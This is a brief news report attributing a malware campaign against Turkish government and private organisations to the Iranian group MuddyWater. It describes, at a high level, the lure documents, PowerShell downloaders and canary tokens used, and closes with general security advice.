A new threat campaign has been observed by researchers targeting Turkish government institutions and private organisations. Researchers have linked the recent campaign to the Iranian advanced persistent threat group MuddyWater APT.
According to a security expert, the MuddyWater APT utilises malicious Microsoft Office documents and portable document format (PDF) as an initial infection transmitter of their attacks.
The malicious documents disguise themselves as legitimate documents from an essential Turkish sector called Turkish Health and Interior Ministries. The cyberattack uses malicious XLS files, PDFs, and Windows executables to release compromised PowerShell-based downloaders, enabling initial footholds into the eyed network.
PowerShell also operates a chain of scripts that download additional payloads. Additionally, the threat actors utilised canary tokens or flags for signaling a complete infection by the hostile artefacts. These tokens may be a strategy of the threat actors to avoid any detection from sandboxes or AV solutions.
Researchers linked these recent campaigns against Turkey to MuddyWater because several technical indicators were identical to the group’s standard infection strategy.
The advanced persistent threat group’s tactics, techniques, and procedures were similar to the recent TTPs used against the Turkish government.
Moreover, the codes and metadata similarities in the scripts and malicious documents utilised in the latest campaign give a great extent of identicality to previously revealed MuddyWater artefacts and tools.
The infection process resembled the described report of a researcher back in 2020. In addition, an IOC was monitored as an essential part of the infection process utilised by the threat operators of the MuddyWater campaigns.
The Iranian APT group MuddyWater runs malicious campaigns globally, increasing its volume and severity, and has provided new ideas for its tools and strategies of operations. Therefore, organisations should employ multi-layer and in-depth security solutions to keep any cybersecurity threats away from their companies and business operations.
